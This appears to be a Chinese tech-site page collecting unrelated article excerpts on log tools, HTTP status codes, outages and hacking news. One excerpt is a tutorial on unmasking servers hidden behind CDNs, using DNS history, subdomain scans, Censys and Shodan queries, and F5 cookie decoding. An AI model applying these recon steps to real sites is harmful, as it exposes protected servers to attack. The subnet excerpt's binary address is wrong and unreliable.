日志分析工具,通过Web 浏览器或者 *nix 系统下的终端程序即可访问。能为系统管理员提供快速且有价值的 HTTP 统计,并以在线可视化服务器的方式呈现。 官网地址: https://www.goaccess.cc/ 4、AWStats 一款功能强大的开源日志分析系统,可以图形方式生成高级Web,流媒体,ftp或邮件服务器统计信息。 官网地址: http://www.awstats.org/ 5、Logstalgia 一款非常炫酷且可视化日志分析工具,可以直观的展示CC攻击和网站的日志分析,并以可视化的3D效果展示出来。 下载地址: http://www.softpedia.com/get/Internet/Servers/Server-Tools/Logstalgia.shtml 6、FinderWeb 程序员的看日志利器,支持,tail, less, grep,支持超大的文本文件,从几M到几十G的日志文件都流畅自如。 下载使用: http://www.finderweb.net/download.html 7、web-log-parser 一款开源的分析web日志工具,采用python语言开发,具有灵活的日志格式配置。 github项目地址: https://github.com/JeffXue/web-log-parser 8、ELK 开源实时日志分析的ELK平台,由ElasticSearch、Logstash和Kiabana三个开源项目组成,在企业级日志管理平台中十分常见。 下载使用: https://www.elastic.co/cn/elastic-stack 9、Splunk 一款顶级的日志分析软件,如果你经常用 grep、awk、sed、sort、uniq、tail、head 来分析日志,那么你可以很容易地过渡到Splunk。 下载地址: https://www.splunk.com/zh-hans_cn/download/splunk-enterprise.html 10、IBM QRadar Qradar有一个免费的社区版本,功能上和商用版本差别不大,适合小规模日志和流量分析使用。 下载地址: https://developer.ibm.com/qradar/ce/ 到此这篇关于10个好用的Web日志安全分析工具推荐小结的文章就介绍到这了,更多相关Web日志安全分析工具内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多主机吧! #### 10个常见的网页HTTP状态码详解 HTTP状态码是用以表示网页服务器HTTP响应状态的3位数字代码,下面为大家介绍500内部服务器错误,404文件未找到,403禁止访问 等常见的10个HTTP状态码 HTTP状态码是用以表示网页服务器HTTP响应状态的3位数字代码。 所有状态码的第一个数字代表了响应的五种状态之一。 当用户试图通过HTTP或FTP协议访问一台运行主机上的内容时,Web服务器返回一个表示该请求的状态的数字代码。 该状态代码记录在服务器日志中,同时也可能在 Web 浏览器或 FTP客户端显示。 也就是我们打开页面发生错误时,浏览器显示的错误信息代码。状态代码可以指明具体请求是否已成功,还可以揭示请求失败的确切原因。 HTTP协议状态码表示的意思主要分为五类,大体是: 1××:保留 2××:表示请求成功地接收 3××:为完成请求客户需进一步细化请求 4××:客户错误 5××:服务器错误 根据Google的搜索数据统计,下面几个是最常见的错误,其中HTTP 500 错误发生机率是404错误的两倍: 500 内部服务器错误 对HTTP 500错误的定义已经充分证明了这是一个最常见的HTTP错误。 一般来说,HTTP 500 错误会在服务器的程序码出错时出现,或者web服务器发生内部错误时返回的信息。 例如,web服务器过载时将无法正确处理访问请求。 404 文件未找到 大多数人都知道这个错误。 当用户试图访问Web服务器(通常是一个网页)上某个实际不存在的资源时,就会发生404错误。404错误可能是由无效的链接引起,也可能是URL拼写错误,还可能是因为虚拟主机将所请求页面移到其他地方(或删除所请求页面)。 一些网站设置了自定义页面以防止坏链接所产生的不良影响。 403 禁止访问 403错误类似于401错误,不同之处在于401错误是未经授权,而403错误是禁止访问。 任何登录对403错误都不起作用。 尝试访问(被禁止的)网站目录时,就会发生403错误。 400 错误请求 Web服务器通过返回HTTP 400错误告诉访问者,访问者用来访问网站的程序出错,或访问请求途中遭到破坏。 401 未经授权 访问者试图访问受限页面但未经授权时,网站返回HTTP 401错误。错误登录尝试是导致这一错误的主因。 200 请求成功 请求已成功,请求所希望的响应头或数据体将随此响应返回。 206 部分内容 服务器已经成功处理了部分GET请求。类似于FlashGet或者迅雷这类的HTTP 下载工具,都是使用此类响应实现断点续传,或者将一个大文档分解为多个下载段同时下载。 301 永久重定向 被请求的资源已永久移动到新位置,并且将来任何对此资源的引用都应该使用本响应返回的若干个URI之一。 302 临时重定向 请求的资源现在临时从不同的URI响应请求。由于这样的重定向是临时的,客户端应当继续向原有地址发送以后的请求。 502 无效网关 作为网关或者代理工作的服务器尝试执行请求时,从上游服务器接收到无效的响应。 更多关于HTTP状态码的介绍大家可以查看下面相关文章列表中的文章 #### 115 网盘遭遇服务器恶意网络攻击 9 月 16 日消息,有站长反馈,115 网盘今日出现服务故障,包括 App、官网网页均显示 502 错误。 网络猜测可能115 网盘停止服务了,对此,今天晚间,115 网盘官方微博发布公告就出现故障作出回应。 紧急声明:今天 (2024 年 9 月 16 日周一),广东一一五科技股份有限公司 (以下简称“115 科技”或“我司”) 服务器遭恶意网络攻击,造成包括 115 生活(曾用名“115 网盘”)在内的产品服务出现登录故障。我司注意到相关情况,技术人员已在第一时间进行紧急修复中,修复完成后将及时告知。对于由此给大家带来的不便,我们深感歉意。 同时,我们也注意到,网络上有人借机恶意大肆传播关于 115 网盘终止服务等内容的不实信息,请大家以我司官方渠道发布的信息为准,理智判断,不信谣、不传谣。我司法务团队已搜集、保留好相关证据,对于传播不实信息、损害品牌声誉、恶意中伤我司者,我们将严肃追究其法律责任。 作为国内较早一批上线的云服务品牌,115 项目于 2009 年上线,迄今已稳定运营超过 15 年。感谢大家长期以来对我们的信任和支持,未来,我们将继续保持初心,以“让数据更有序,让信息更智慧”为使命,打造让用户“终身信赖”的科技服务品牌,为用户提供更优质、更稳定的服务。115 生活,一生相伴。 广东一一五科技股份有限公司 2024 年 9 月 16 日周一 “115 网盘”是广东一一五科技股份有限公司于 2009 年推出的一款云存储产品。2018 年 6 月 7 日,115 科技在 2018 云栖大会・上海峰会上宣布,已将公司全部数据迁移至阿里云上,双方合力完成了此次公共云数据迁移,总量超过 100PB,整个过程耗时 45 天。 115 网盘曾经是国内最大的网盘服务,市场份额比百度网盘还高,后来合法合规等问题,115 网盘限制了分享服务,导致市场份额一落千丈,目前在网盘市场上虽然还有一定的份额,不过相比百度网盘差距太远了。 #### 11种有可能绕过CDN查到服务器真实IP方法 方法1: 很简单,使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN, 多地 Ping 网站有: http://ping.chinaz.com/ http://ping.aizhan.com/ http://ce.cloud.360.cn/ 方法2: 使用 nslookup 进行检测,原理同上,如果返回域名解析对应多个 IP 地址多半是使用了 CDN。有 CDN 的示例:   www.163.com 服务器: public1.114dns.com Address: 114.114.114.114 非权威应答: 名称: 163.xdwscache.ourglb0.com Addresses: 58.223.164.86 125.75.32.252 Aliases: www.163.com www.163.com.lxdns.com   无 CDN 的示例:   xiaix.me 服务器: public1.114dns.com Address: 114.114.114.114 非权威应答: 名称: xiaix.me Address: 192.3.168.172 0x02 绕过 CDN 查找网站真实 IP 方法1:查询历史DNS记录   1)查看 IP 与 域名绑定的历史记录,可能会存在使用 CDN 前的记录,相关查询网站有: https://dnsdb.io/zh-cn/ ###DNS查询 https://x.threatbook.cn/ ###微步在线 http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询 http://viewdns.info/ ###DNS、IP等查询 https://tools.ipip.net/cdn.php ###CDN查询IP   2)利用SecurityTrails平台,攻击者就可以精准的找到真实原始IP。他们只需在搜索字段中输入网站域名,然后按Enter键即可,这时“历史数据”就可以在左侧的菜单中找到。 如何寻找隐藏在CloudFlare或TOR背后的真实原始IP 除了过去的DNS记录,即使是当前的记录也可能泄漏原始服务器IP。例如,MX记录是一种常见的查找IP的方式。如果网站在与web相同的服务器和IP上托管自己的邮件服务器,那么原始服务器IP将在MX记录中。 方法2:查询子域名 毕竟 CDN 还是不便宜的,所以很多站长可能只会对主站或者流量大的子站点做了 CDN,而很多小站子站点又跟主站在同一台服务器或者同一个C段内,此时就可以通过查询子域名对应的 IP 来辅助查找网站的真实IP。 下面介绍些常用的子域名查找的方法和工具:   1)微步在线(https://x.threatbook.cn/) 上文提到的微步在线功能强大,黑客只需输入要查找的域名(如baidu.com),点击子域名选项就可以查找它的子域名了,但是免费用户每月只有5次免费查询机会。如图:   2)Dnsdb查询法。(https://dnsdb.io/zh-cn/) 黑客只需输入baidu.com type:A就能收集百度的子域名和ip了。如图:     3)Google 搜索 Google site:baidu.com -www就能查看除www外的子域名,如图:   4)各种子域名扫描器 这里,主要为大家推荐子域名挖掘机和lijiejie的subdomainbrute(https://github.com/lijiejie/subDomainsBrute) 子域名挖掘机仅需输入域名即可基于字典挖掘它的子域名,如图:   Subdomainbrute以windows为例,黑客仅需打开cmd进入它所在的目录输入Python subdomainbrute.py baidu.com --full即可收集百度的子域名,如图: 注:收集子域名后尝试以解析ip不在cdn上的ip解析主站,真实ip成功被获取到。   方法3:网络空间引擎搜索法 常见的有以前的钟馗之眼,shodan,fofa搜索。以fofa为例,只需输入:title:“网站的title关键字”或者body:“网站的body特征”就可以找出fofa收录的有这些关键字的ip域名,很多时候能获取网站的真实ip,如图: 方法4:利用SSL证书寻找真实原始IP 使用给定的域名 假如你在xyz123boot.com上托管了一个服务,原始服务器IP是136.23.63.44。 而CloudFlare则会为你提供DDoS保护,Web应用程序防火墙和其他一些安全服务,以保护你的服务免受攻击。为此,你的Web服务器就必须支持SSL并具有证书,此时CloudFlare与你的服务器之间的通信,就像你和CloudFlare之间的通信一样,会被加密(即没有灵活的SSL存在)。这看起来很安全,但问题是,当你在端口443(https://136.23.63.44:443)上直接连接到IP时,SSL证书就会被暴露。 此时,如果攻击者扫描0.0.0.0/0,即整个互联网,他们就可以在端口443上获取在xyz123boot.com上的有效证书,进而获取提供给你的Web服务器IP。 目前Censys工具就能实现对整个互联网的扫描,Censys是一款用以搜索联网设备信息的新型搜索引擎,安全专家可以使用它来评估他们实现方案的安全性,而黑客则可以使用它作为前期侦查攻击目标、收集目标信息的强大利器。Censys搜索引擎能够扫描整个互联网,Censys每天都会扫描IPv4地址空间,以搜索所有联网设备并收集相关的信息,并返回一份有关资源(如设备、网站和证书)配置和部署信息的总体报告。 而攻击者唯一需要做的就是把上面用文字描述的搜索词翻译成实际的搜索查询参数。 xyz123boot.com证书的搜索查询参数为:parsed.names:xyz123boot.com 只显示有效证书的查询参数为:tags.raw:trusted 攻击者可以在Censys上实现多个参数的组合,这可以通过使用简单的布尔逻辑来完成。 组合后的搜索参数为:parsed.names: xyz123boot.com and tags.raw: trusted   Censys将向你显示符合上述搜索条件的所有标准证书,以上这些证书是在扫描中找到的。 要逐个查看这些搜索结果,攻击者可以通过单击右侧的“Explore”,打开包含多个工具的下拉菜单。What's using this certificate? > IPv4 Hosts   此时,攻击者将看到一个使用特定证书的IPv4主机列表,而真实原始 IP就藏在其中。   你可以通过导航到端口443上的IP来验证,看它是否重定向到xyz123boot.com?或它是否直接在IP上显示网站? 使用给定的SSL证书 如果你是执法部门的人员,想要找出一个隐藏在cheesecp5vaogohv.onion下的儿童色情网站。做好的办法,就是找到其原始IP,这样你就可以追踪到其托管的服务器,甚至查到背后的运营商以及金融线索。 隐藏服务具有SSL证书,要查找它使用的IPv4主机,只需将"SHA1 fingerprint"(签名证书的sha1值)粘贴到Censys IPv4主机搜索中,即可找到证书,使用此方法可以轻松找到配置错误的Web服务器。 方法5:利用HTTP标头寻找真实原始IP 借助SecurityTrails这样的平台,任何人都可以在茫茫的大数据搜索到自己的目标,甚至可以通过比较HTTP标头来查找到原始服务器。 特别是当用户拥有一个非常特别的服务器名称与软件名称时,攻击者找到你就变得更容易。 如果要搜索的数据相当多,如上所述,攻击者可以在Censys上组合搜索参数。假设你正在与1500个Web服务器共享你的服务器HTTP标头,这些服务器都发送的是相同的标头参数和值的组合。而且你还使用新的PHP框架发送唯一的HTTP标头(例如:X-Generated-Via:XYZ框架),目前约有400名网站管理员使用了该框架。而最终由三个服务器组成的交集,只需手动操作就可以找到了IP,整个过程只需要几秒钟。 例如,Censys上用于匹配服务器标头的搜索参数是80.http.get.headers.server :,查找由CloudFlare提供服务的网站的参数如下: 80.http.get.headers.server:cloudflare     方法6:利用网站返回的内容寻找真实原始IP 如果原始服务器IP也返回了网站的内容,那么可以在网上搜索大量的相关数据。 浏览网站源代码,寻找独特的代码片段。在JavaScript中使用具有访问或标识符参数的第三方服务(例如Google Analytics,reCAPTCHA)是攻击者经常使用的方法。 以下是从HackTheBox网站获取的Google Analytics跟踪代码示例: ga('create','UA-93577176-1','auto'); 可以使用80.http.get.body:参数通过body/source过滤Censys数据,不幸的是,正常的搜索字段有局限性,但你可以在Censys请求研究访问权限,该权限允许你通过Google BigQuery进行更强大的查询。 Shodan是一种类似于Censys的服务,也提供了http.html搜索参数。 搜索示例:https://www.shodan.io/search?query=http.html%3AUA-32023260-1   方法7:使用国外主机解析域名 国内很多 CDN 厂商因为各种原因只做了国内的线路,而针对国外的线路可能几乎没有,此时我们使用国外的主机直接访问可能就能获取到真实IP。 方法8:网站漏洞查找 1)目标敏感文件泄露,例如:phpinfo之类的探针、GitHub信息泄露等。 2)XSS盲打,命令执行反弹shell,SSRF等。 3)无论是用社工还是其他手段,拿到了目标网站管理员在CDN的账号,从而在从CDN的配置中找到网站的真实IP。 方法9:网站邮件订阅查找 RSS邮件订阅,很多网站都自带 sendmail,会发邮件给我们,此时查看邮件源码里面就会包含服务器的真实 IP 了。 方法10:用 Zmap 扫全网 需要找 xiaix.me 网站的真实 IP,我们首先从 apnic 获取 IP 段,然后使用 Zmap 的 banner-grab 扫描出来 80 端口开放的主机进行 banner 抓取,最后在 http-req 中的 Host 写 xiaix.me。 方法11:F5 LTM解码法 当服务器使用F5 LTM做负载均衡时,通过对set-cookie关键字的解码真实ip也可被获取,例如:Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000,先把第一小节的十进制数即487098378取出来,然后将其转为十六进制数1d08880a,接着从后至前,以此取四位数出来,也就是0a.88.08.1d,最后依次把他们转为十进制数10.136.8.29,也就是最后的真实ip。   转自废材召唤师:https://www.cnblogs.com/qiudabai/p/9763739.html #### 15岁山东初中生做的网站刚刚被数百万元收购了 最新开源圈出现一个非常厉害的初中生,其开源的项目 Chat Nio 被百万收购。 ChatNio 是一个综合了各种流行的模型和服务的一站式平台。它接入了 OpenAI、Midjourney、Claude、讯飞星火、Stable Diffusion、DALL・E、ChatGLM、通义千问、腾讯混元、360智脑、百川 AI、火山方舟、新必应、Gemini 和 Moonshot 等等模型。 项目地址:https://github.com/zmh-program/chatnio在线体验:https://chatnio.net/ 它的功能同样主打一个全面,除了常规的 chatbot,还有类似 GPTs 的各种专业 AI 小助手。 主机帮只能说,现在的小孩太厉害了! #### 1618域名交易平台涉嫌诈骗 涉案金额上亿元 1618域名诈骗案,范围辐射全国各地,涉案金额上亿! 第一、1618.com域名交易平台没有资质,无证经营 1618域名注册公司为珠海市易米科技有限公司,从工商信息查询来看公司的的经营范围有:软件开发、知识产权服务,互联网域名注册服务,数据处理及存储服务,计算机领域的技术开发、技术转让、技术咨询、技术服务,网络工程开发建设,高新科技项目的研发,互联网服务。 由此可见,也就是域名注册服务跟域名沾边,其他的域名交易,P2P网贷没有任何资质,没有任何批文,没有任何备案,完全无证经营。 第二、诈骗手法花样百出,反复割韭菜。 1618网站通过控制交易平台、拉升价格,发放福利,吸引人购买高价域名,反复割韭菜操作。 1、平台发公告承诺购买50个4声CN域名(价格6000人民币左右),可以每天领取价值500元的6数域名,利用这样的手法,吸引大量投资人买入之后,平台迅速出货大量套现,然后价格从6000元暴跌至1000元。 2、反复割韭菜,例如:4声cn域名从800元/个拉到6070元/个,然后迅速暴跌到2000元/个,然后平台又拉到3500元/个,如今又砸到800元/个,套取大量资金。 3、平台自己发行空气域名 oo.cn,vv.cn的二级域名,承诺1000:1兑换,4声com和4声cn,吸引几千万资金购卖。诈骗走几千万,如今根本不给兑换域名。 4、无牌照金融投资中心,年化率13%~15%高息引人投资,然后在高利息借贷给其他用户,如今根本不给人提现。 5,私自拿用户大量域名去米贷网midai123.com抵押贷款,现在跟本不返还用户,要钱没有要域名也不给。 如今1618公司已人去楼空。公司控制人航伟(真名沈晓航)已潜逃出国,6月15日临时变更法人代表为大奔(真名潘杭)不知是否在国内,偶尔QQ上出现下。 不给用户提现提域名。每天只给提点便宜域名,贵的不给提。血洗几万用户,很多人亏几万、几十万、上百万,快崩溃了。扬言要做出各种极端行为,恳亲政府介入救救大家,避免家破人亡,人间惨剧。 #### 1688商人社区下线老阿里头条功能 新阿里头条启用新网址 11月30日 消息:昨日,1688商人社区发布通知称为提升1688商人社区用户使用体验,从2021年12月31日起,我们将对老阿里头条( toutiao.1688.com )功能进行下线。 据悉,该功能下线后将有以下几点变化: 老阿里头条网址为 toutiao.1688.com ,新阿里头条网址为 club.1688.com ,请用户从新网址进入1688商人社区首页; 原网址内容将下线,用户如有疑问可咨询平台客服400-800-1688。 1688商人社区强调,自即日起,用户需统一从1688商人社区首页【写头条】入口(下图蓝色标注位置)进行内容发布。 #### 1688平台“采源宝”APP停止运营和服务 4月22日 消息:今日, 1688 平台发布通知称,因业务调整,自 2022 年 5 月 9 日起, 1688 平台将陆续停止采源宝APP的各项功能和服务。 1688 平台预计将于 2022 年 6 月底前全面停止采源宝APP服务(具体时间以 1688 后续提前公告的时间为准)。 根据公告,自 2022 年 5 月 9 日起,用户将无法在采源宝APP进行任何新的交易(包括但不限于通过采源宝APP购买任何服务或商品等)。对于在 2022 年 5 月 9 日前已成功下单的用户,用户双方应当继续履行;为减少对历史订单的影响,平台将提供在1688(阿里巴巴)App完成历史订单的服务,可以在登陆1688(阿里巴巴)App后对历史订单进行查看和操作(但采源宝APP支持的由ISV提供的小店服务和功能无法通过该方式进行操作,具体以下述和后期专门针对小店部分的公告为准)。 关于采源宝APP停止支持由ISV提供的小店服务和功能的节奏及方案: 1)自 2022 年 5 月 9 日起,用户无法在采源宝APP小店内进行任何新的交易,您仍可以在采源宝APP全面停止服务前继续履行存量交易和订单; 2)采源宝APP全面停止服务后,用户将无法再使用“小店功能”。为了保护您的用户体验和减少对您的影响, 1688 平台将针对该部分功能的服务和功能停止的方案发布公告,并提供具体的方案,请您保持关注;届时请您及时根据 1688 平台出具的公告方案进行操作,以免功能或服务停止给您带来影响。 1688 方面强调,同时,平台为用户提供了新功能 “会员号”场景,商家可通过“ 1688 商家工作台-客户-会员号”发布动态及商品,买家可登陆1688(阿里巴巴)APP后通过“我的-会员号”成为商家会员,并以会员身份获得商家的私密商品、专享价格,支持 1 件起批、拿货下单等。“会员号”功能将不断优化迭代,具体功能以“会员号” 产品更新为准。 #### 16家企业被纳入电信业务经营不良名单 因存在违规行为 3月12日 消息:昨日,工信部发文称, 2019 年四季度,依据《电信条例》《电信业务经营许可管理办法》等相关规定, 16 家企业因无正当理由中止对电信用户的电信服务、接入未备案网站、违反实名制规定、不配合调查等违法违规行为,受到电信管理机构行政处罚并被纳入电信业务经营不良名单。 其中包括了:中国移动云南昆明分公司、北京新网数码信息技术有限公司、上海安畅网络科技股份有限公司、深圳市联华世纪通信技术有限公司、飞流九天成都科技有限公司等。 #### 17 岁英国少年因涉嫌攻击美高梅集团被捕 根据 BBC 和 404 Media 报道,英国警方逮捕了一名 17 岁少年,涉嫌和去年 9 月发生的美高梅在线娱乐官网公司网络攻击事件有关。 美国联邦调查局(FBI)和英国国家犯罪署联合行动,英国西米德兰兹郡警方于周五以涉嫌违反黑客攻击和敲诈勒索的法律,拘留这名少年。 西米德兰兹郡警方称,嫌疑人已被保释,警方正在进行调查,警方搜查了这名少年位于英国沃尔索尔的住处,将取证检查“一些数字设备”。 酒店和娱乐公司美高梅国际酒店集团(MGM Resorts)于 2023 年 9 月遭到勒索软件攻击,导致美高梅酒店、赌场的网络系统瘫痪,影响了其主要网站、在线预订系统,以及老虎机、信用卡终端和自动取款机等赌场服务。 攻击事件发生几天后,一个号称是 BlackCat / ALPHV 勒索软件附属黑客组织 Scattered Spider 嚣张地宣称对此次勒索攻击事件负责。 根据 Security Affairs 网站披露的细节,本次勒索软件攻击造成损失超过了 1.1 亿美元(IT之家备注:当前约 8 亿元人民币)。 联邦调查局网络处助理处长布莱恩・沃恩德兰(Bryan Vorndran)在一份新闻稿中说: 联邦调查局将与其合作伙伴协调,继续不遗余力地追捕以美国公司为目标的恶意行为者,无论他们身处何地,也无论他们的技术有多复杂,我们都会将其绳之以法。 #### 17 年老游戏腾讯《QQ 堂》今日正式停服  4 月 20 日消息,今日,腾讯旗下休闲娱乐游戏《QQ 堂》将正式停止在中国大陆地区的运营。这款游戏将于今日 11 点关闭服务器,届时玩家将无法登录游戏。 《QQ 堂》于 2004 年底上线,至今运营已逾 17 年。在社交媒体上,不少网友 19 日晚发文称在《QQ 堂》停服前夜上线与游戏道别。 去年 12 月,《QQ 堂》发布停运公告称,因项目组战略计划,《QQ 堂》将在 2022 年 4 月 20 日停止中国大陆地区的运营,《QQ 堂》将在 2022 年 4 月 20 日 11 点关闭游戏服务器。 此前,《QQ 堂》已于 2021 年 12 月 16 日关闭 Q 币 / Q 点支付和新用户注册。今日,除游戏服务器关闭外,《QQ 堂》游戏官网、论坛、专属客服也将关闭。 停服公告显示,《QQ 堂》游戏服务器关闭后,除法律法规另有规定或腾讯与玩家签署的协议另有约定外,游戏内的所有账号数据及角色资料等信息将被全部删除。 这款游戏刚出来的时候非常火,主机吧当时还在念初中,一度迷上这款游戏,一上网吧就玩,是一款非常需要手速和脑力的游戏,可惜了。 #### 17K小说网站创始人血酬离世 多家媒体报道,2023年6月24日下午,知名网站创始人刘英先生在北京市和平里医院病故,享年42岁。刘英出生于1981年,山东荣成人,生前履历十分辉煌,是中国文艺评论家协会会员,北京作家协会会员。 公开资料中显示,刘英(编辑名:血酬)2005年入职起点中文网,任二组编辑、主编,负责“三江阁”推荐和第二编辑组工作。2006年参与创建17K小说网。2008年在投资方中文在线主导下将网站从上海迁至北京,重组17K进行“二次创业”。2008年,17K开办首届“网编训练营”。 #### 17岁少年买不到回国机票DDOS攻击机场系统被抓 15岁自学计算机技术,并且也有一定的技术水平,本来拥有大好的前途光明,但却因为自己的一时糊涂,做出违法的事情锒铛入狱,着实令人唏嘘不已。 据广州日报报道,现年17岁的小陈,上完小学三年级后便辍学打工,自15岁起自学数字货币开发、大数据、区块链技术、人工智能等计算机技术,并从事相关工作。 本来一名努力上进的青少年,由于出国后受疫情影响滞留国外,当时自己年纪小又发烧,害怕被感染。加之女朋友怀孕,压力较大,特别想回国。 但在2020年6月初,滞留在国外疫情重区的小陈因无法买到回国机票而产生不满情绪。 冲动之下,他向南航发送威胁邮件,并在境外网站购买攻击套餐,利用 DDOS(黑客通过远程控制服务器或计算机等资源,对目标发动高频服务请求,使目标服务器因来不及处理海量请求而瘫痪)等攻击手段,多次、持续攻击南航客票等计算机系统。 此次黑客入侵,造成南航对外服务网络全部瘫痪,包括客票业务、微信直播平台销售、机场旅客服务、飞行、运控等系统无法正常运作,给航空公司造成了巨大经济损失与负面网络舆论评价。 7 月,归国的小陈在广州一酒店办理解除隔离手续时,被公安机关抓获。归案后,小陈如实向公诉机关供述了自己的罪行,对指控的事实和罪名均没有异议。 白云法院一审认为,小陈对计算机信息系统功能进行干扰,造成计算机信息系统不能正常运行,后果特别严重,其行为已构成破坏计算机信息系统罪。 考虑到小陈犯罪时已满十六周岁不满十八周岁,依法应当减轻或者从轻处罚。综合考虑小陈犯罪行为的性质、情节、危害后果及认罪态度,判决小陈犯破坏计算机信息系统罪,判处有期徒刑四年;缴获的作案工具笔记本电脑一台予以没收。 一审宣判后,小陈不服判决,提起上诉。广州中院经审理后裁定驳回上诉,维持原判。   #### 17岁少年黑客落网,引出一桩“亿级”信息大案 本文作者:李勤 3 月 11 日,17 岁云南少年小李像往常一般去学校上学,但他可能没想到,自己的人生就将产生重大转折。 2700 公里外,一帮经验老道的老网警从北京海淀赶来,与云南当地警方打了个配合,将一起可能是 2018 年来最大非法获取公民个人信息案的主人公之一抓获。 拥有多年经验的网警老董揉了揉眼睛。其实,早在抓捕前,他就得知这个主人公是一个 17 岁的少年,只是亲眼见到这个少年时,他还是被这张稚嫩的年轻面孔震动了一下。 引子 也许,小李从未想象过这样的骇人阵势,在抓捕现场,少年很快承认了自己的全部犯罪事实。 但是,少年只是这起大案的“引子”。 警方在对李某某的家中进行搜查,并通过提取在李某某的电脑内数据,从中发现涉嫌数家网络公司等各类信息数据,存储在云计算服务器内数据 760 万余条。 3 月 15 日,海淀警方将少年押回了北京接受进一步审查,4 月 5 日,抓捕组民警在石家庄警方的配合下,在河北石家庄市鹿泉区将涉案公司的冯某某、王某成、程某、王某锋 4 名犯罪嫌疑人抓获。 随后,民警在该公司的电脑内提取了包含知名网络公司等各类信息数据上亿条,涵盖了银行卡号、手机号码、邮箱、网站注册信息等。 “亿级”信息大案 两年前,少年小李就给自己埋下了悲剧的种子。 2016 年,从小酷爱钻研黑客技术的小李开发了一个程序,发现了多家网络公司服务器的漏洞。随后,他获取了大量网络公司的用户名等大量数据。 小李一下被喜悦冲昏了头脑,看着周围还懵然无知的同龄人,觉得自己的技术厉害极了。为了展现“成就”,炫耀一把自己的技术能力,小李在某网络论坛上展现了自己的“秘密”。没多久,就有一个自称是北京一家科技公司的人闻讯而来,联系了小李,并发出邀请,以每个月 500 元的薪酬,让他定期提供自己获得的网络用户信息。 原来自己的“技术”还能赚钱?!小李一口答应了这个邀约,“成功”赚了几千块钱。 万万没想到,这每月的 500 块钱竟是他通向罪恶深渊的“引路钱”。 这家号称在北京的科技公司原来落地河北,打着经营计算机软件、硬件、电子产品、辅助设备的开发销售等业务的幌子,通过软件获取的用户信息用于对外销售牟利。 小李利用云服务器非法获取各大网络公司用户信息的举动很快引起了一家北京互联网公司的注意,他们迅速报案,海淀警方通过勘验分析后,发现大量线索的追踪溯源指向了小李。 于是,出现了文头抓捕那一幕。 目前,冯某某、王某成、程某、王某锋四人因涉嫌侵犯公民个人信息罪均已被海淀警方刑事拘留,小李因未成年已被海淀警方依法取保候审,案件还在进一步审理中。 背后 关于这起大案,雷锋网编辑还有许多疑问,于是找到了负责讲解这起案件的海淀分局警务支援大队副大队长董立波(上图右二)。 1.雷锋网:我听说这起案件是海淀分局今年破获的最大一起侵犯公民个人信息案,请问涉及哪些行业的信息泄露? 董:应该这样说比较合适,这起案件是 2018 年以来海淀分局破获的最大一起侵犯公民个人信息案,你可以看到,警方查获的各类数据信息上亿条。至于什么行业,我们的资料里提到,涉及了多家网络公司,而且包含了身份证号、手机号码、邮箱等多种信息。 2.雷锋网:在这起案件中,他们如何利用云服务器非法获取信息? 董:其实,在这起案件中,只有涉案的未成年李某某设计了这个程序,当时是他自己写的代码,获取了一些信息,李某某只给上述公司提供了一些信息。 3.雷锋网:听说这个团伙对外销售牟利其实没有特别多,法院会如何量刑? 董:《最高人民法院、最高人民检察院关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》在 2017 年发布,进一步明确了侵犯公民个人信息罪的定罪量刑标准。上述《解释》共十三条,包括明确了“公民个人信息”的范围、非法“提供公民个人信息”的认定标准等十个方面内容,于 2017 年 6 月 1 日起正式施行。 基于不同类型公民个人信息的重要程度,《解释》分别设置了“五十条以上”“五百条以上”“五千条以上”的入罪标准,以体现罪责刑相适应。出售或者非法提供公民个人信息往往是为了牟利,基于此,《解释》将违法所得五千元以上的规定为“情节严重”。 就这起案件而言,它涉及的银行卡、通讯记录的信息数量已经达到了入罪标准,获取的其它信息也早就达到了五千条以上。再加上这起案件的涉及的信息数量远超标准,可以说能达到法定意义上的加重了。 4.雷锋网(公众号:雷锋网):与以往你们遇到的同类型案件相比,这起案件除了涉案信息数量特大,还有什么特点? 董:我们之所以把这起案件单独列出来,除了涉案数据量巨大,影响力大,还因为现在很多大公司频频出现信息泄漏事件,这起案件是警方主动出击,打掉了其中一个产业链条,我们希望能引起公司们对此的重视。 数据是核心竞争力,但是很多数据的来源数不清也道不明,很多企业、很多人因此游走在灰色甚至是黑色地带,自律、他律、法律,律律都不能少。互联网领域需要一条红线,一条不容随意践踏和逾越的红线,越线必被捉。也希望广大互联网公司树立起红线意识,让大数据产业健康发展起来,让广大互联网用户拥有自己的隐私,明白自己的权利。 #### 183.248.220.160/27 中27是指什么 IP段范围是多少 在IP地址183.248.220.160/27中,"/27"表示子网掩码的长度。这个数字27代表子网掩码中连续的1的个数。在子网掩码中,每增加一个1,就意味着子网的划分更加细致,可用的主机地址数量就会减少。 具体来说,子网掩码的长度决定了IP地址中网络地址和主机地址的划分方式。对于/27的子网掩码,前27位是网络位,剩下的5位是主机位。这意味着子网掩码是255.255.255.224,因为27个1在二进制中表示为11111111.11111111.11111111.11100000。 现在,我们可以根据这个子网掩码来确定IP段的范围。 首先,我们需要计算网络地址。对于183.248.220.160/27,网络地址是将IP地址与子网掩码进行逻辑AND运算的结果。计算如下: IP地址: 183.248.220.160 子网掩码: 255.255.255.224 (/27) ---------------------------- 网络地址: 183.248.220.160 在二进制中,网络地址是: 网络地址: 10101101.11110000.11011010.10000000 接下来,我们需要确定子网内的主机地址范围。由于有5位主机位,子网内的第一个主机地址是网络地址的下一个地址,即网络地址的最后一个八位字节(主机部分)加1。最后一个主机地址是网络地址的最后一个八位字节(主机部分)加30(因为5位主机位可以表示的最大数是31,但我们不能使用最后一个地址,因为它是广播地址)。 所以,对于183.248.220.160/27的子网,主机地址范围是: 第一个主机地址:183.248.220.161 最后一个主机地址:183.248.220.190 广播地址是子网中最后一个地址,它是网络地址的最后一个八位字节(主机部分)全部置为1。所以,广播地址是: 广播地址:183.248.220.191 综上所述,183.248.220.160/27的IP段范围是从183.248.220.160到183.248.220.191,其中包含网络地址183.248.220.160,第一个主机地址183.248.220.161,最后一个主机地址183.248.220.190,以及广播地址183.248.220.191。 #### 190亿密码泄露引恐慌!超94%密码1秒被破?这份报告教你避开高危密码陷阱 